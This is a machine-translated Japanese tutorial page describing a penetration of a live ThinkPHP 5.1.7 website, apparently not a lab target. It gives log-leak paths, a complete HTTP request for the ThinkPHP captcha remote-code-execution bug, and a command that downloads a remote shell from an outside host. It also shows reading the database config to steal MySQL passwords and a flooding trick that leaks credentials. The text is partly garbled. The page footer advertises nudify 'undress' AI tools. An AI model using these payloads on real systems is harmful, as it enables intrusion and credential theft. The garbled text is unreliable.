次のthinkphp フレームワークチュートリアル コラムでは、ThinkPHP フレームワークの実践的な理解を共有します。困っている友人の役に立てば幸いです。
情報収集
Web サイト http://x.x.x.x/ を見つけて侵入を開始します
まず、nmap を使用して、被害サーバーに対して開いているポートをスキャンして検出します。ポート
開いているポートは次のように表示されます。
ポートは、コンピュータ通信におけるアプリケーションの一意の識別 ID です。ポートを通じて、被害者サーバーによってどのようなサービスが開かれているかを知ることができます。
たとえば、3306 は mysql であり、外部接続が有効になっています。次に、ポート アクセスをチェックして、どのようなサービスが開かれているかを確認します。
8080 が phpmyadmin を開きました。PHP 接続の mysql ツールを使用して、mysql パスワードを解析できます
#既存のルートではない任意の番号を入力し、http://x.x.x.x/gfvhf
# などのエラー メッセージを確認します。 成功エラー: バージョンthinkphp フレームワークのバージョンは 5.1.7 です (このバージョンにはインジェクションの脆弱性があります)
8084 は、
## を収集し続けるバックグラウンドです。
#8092 は背景です。展開が標準化されていないため、thinkphp のログ漏洩があり、パスは http://x.x.x.x:8092/runtime/log/202112/19.log であるアカウントとパスワードを確認できます。管理者がログインしました。
ここではthinkphpフレームワークを使ったブラックプロダクトについて話しますが、運用保守が中途半端なのでthinkphpのログが漏洩する可能性が非常に高いです
tp5-6 payload:domain name/runtime/log/202112/19.log (
次の 202112/19.log は現在の日付に基づいて変更されます)
tp3 ペイロード: ドメイン名/Application/Runtime/Logs/ Home/21_12_19.log (次の 21_12_19.log は による)
POST /index.php?s=captcha&echod=phpinfo() HTTP/1.1 Host: x.x.x.x Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.57 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: pmaCookieVer=5; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; phpMyAdmin=iar4j14536rat57j1d5018qjtt8vj69g Content-Type:application/x-www-form-urlencoded Content-Length: 77 _method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod### を実行させることです。実行は成功し、php################の書き込みを開始します。 ## #
POST /index.php s=captcha&echod=copy('http://x.x.x.x/2.txt','t2.php') HTTP/1.1###これは、サーバー上のリモート シェル ファイル http://x.x.x.x/2.txt をダウンロードし、現在の Web ディレクトリの t2.php に書き込むことを意味します## ####しかし、t2.php にアクセスすると、404 が表示される場合、現在のディレクトリに書き込み権限がないことを意味すると思います。######そこで、書き込み権限を与えようとしました:###POST /index.php?s=captcha&echod=chmod('./',0777) HTTP/1.1## #シェルをまだ作成できず、PHP のアクセス許可が非常に低いことがわかりました。 ######データベース構成ファイルを読み取るには、chmod('./',0777) を readfile('../application/database.php') に置き換えます。 mysqlアカウントのパスワードが正常に取得できたことが分かりました。 ###############前に発見した phpmyadmin サービスを使用してログインし、mysql を開いて外部接続します。######mysql 管理ツールを使用して接続し、多数のファイルを検索します。データベース。また、mysql には root 権限が直接与えられており、サーバーを昇格させる (イントラネットへの横方向の侵入) ことができます。いずれにせよ、外部ネットワークによって突破口が開かれたので、ここでは詳しく説明しません。 ############概要
私が自分で考え出したアイデアのいくつかを要約します。 thinkphp がデバッグ モードをオンにし、サーバーがデータベースの外部接続をオンにすると、mysql サービスを爆発させることによって大量のリクエストを送信できます ( mysql をブロックさせます)、mysql への thinkphp 接続がタイムアウトすると、接続例外エラーが報告され、mysql アカウントのパスワードがページに出力されます。
推奨学習: 「thinkphp ビデオ チュートリアル 」
以上がThinkPHP フレームワークの実践的な浸透を思い出してください。の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
ThinkPHPの組み込みテストフレームワークの主な機能は何ですか?Mar 18, 2025 pm 05:01 PMこの記事では、ThinkPHPの組み込みテストフレームワークについて説明し、ユニットや統合テストなどの主要な機能と、早期のバグ検出とコード品質の向上を通じてアプリケーションの信頼性を高める方法について強調しています。
リアルタイムの株式市場データフィードを構築するためにThinkPhpを使用する方法は?Mar 18, 2025 pm 04:57 PM記事では、リアルタイムの株式市場データフィードにThinkPhpを使用して、セットアップ、データの正確性、最適化、セキュリティ対策に焦点を当てて説明します。
サーバーレスアーキテクチャでThinkPhpを使用するための重要な考慮事項は何ですか?Mar 18, 2025 pm 04:54 PMこの記事では、パフォーマンスの最適化、ステートレス設計、セキュリティに焦点を当てたサーバーレスアーキテクチャでThinkPhpを使用するための重要な考慮事項について説明します。コスト効率やスケーラビリティなどの利点を強調しますが、課題にも対処します
ThinkPhpマイクロサービスでサービスの発見と負荷分散を実装する方法は?Mar 18, 2025 pm 04:51 PMこの記事では、セットアップ、ベストプラクティス、統合方法、および推奨ツールに焦点を当てたThinkPhpマイクロサービスにサービスの発見と負荷分散の実装について説明します。[159文字]。
ThinkPhpの依存関係噴射コンテナの高度な機能は何ですか?Mar 18, 2025 pm 04:50 PMThinkPHPのIOCコンテナは、PHPアプリで効率的な依存関係管理のための怠zyなロード、コンテキストバインディング、メソッドインジェクションなどの高度な機能を提供します。
リアルタイムのコラボレーションツールを構築するためにThinkPhpを使用する方法は?Mar 18, 2025 pm 04:49 PMこの記事では、ThinkPhpを使用してリアルタイムのコラボレーションツールを構築し、セットアップ、Websocket統合、セキュリティベストプラクティスに焦点を当てて説明します。
SaaSアプリケーションを構築するためにThinkPhpを使用することの主な利点は何ですか?Mar 18, 2025 pm 04:46 PMThinkPhpは、軽量のデザイン、MVCアーキテクチャ、および拡張性を備えたSaaSアプリに利益をもたらします。スケーラビリティを向上させ、開発を速め、さまざまな機能を通じてセキュリティを改善します。
ThinkPhpとRabbitmqを使用して分散タスクキューシステムを構築する方法は?Mar 18, 2025 pm 04:45 PMこの記事では、ThinkPhpとRabbitMQを使用して分散タスクキューシステムの構築を概説し、インストール、構成、タスク管理、およびスケーラビリティに焦点を当てています。重要な問題には、Immedのような一般的な落とし穴を避けるための高可用性の確保が含まれます
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
AI Hentai Generator
AIヘンタイを無料で生成します。
人気の記事
ホットツール
mPDF
mPDF は、UTF-8 でエンコードされた HTML から PDF ファイルを生成できる PHP ライブラリです。オリジナルの作者である Ian Back は、Web サイトから「オンザフライ」で PDF ファイルを出力し、さまざまな言語を処理するために mPDF を作成しました。 HTML2FPDF などのオリジナルのスクリプトよりも遅く、Unicode フォントを使用すると生成されるファイルが大きくなりますが、CSS スタイルなどをサポートし、多くの機能強化が施されています。 RTL (アラビア語とヘブライ語) や CJK (中国語、日本語、韓国語) を含むほぼすべての言語をサポートします。ネストされたブロックレベル要素 (P、DIV など) をサポートします。
SublimeText3 Linux 新バージョン
SublimeText3 Linux 最新バージョン
Dreamweaver Mac版
ビジュアル Web 開発ツール
SublimeText3 英語版
推奨: Win バージョン、コードプロンプトをサポート!
DVWA
Damn Vulnerable Web App (DVWA) は、非常に脆弱な PHP/MySQL Web アプリケーションです。その主な目的は、セキュリティ専門家が法的環境でスキルとツールをテストするのに役立ち、Web 開発者が Web アプリケーションを保護するプロセスをより深く理解できるようにし、教師/生徒が教室環境で Web アプリケーションを教え/学習できるようにすることです。安全。 DVWA の目標は、シンプルでわかりやすいインターフェイスを通じて、さまざまな難易度で最も一般的な Web 脆弱性のいくつかを実践することです。このソフトウェアは、
ホットトピック
7456
15137652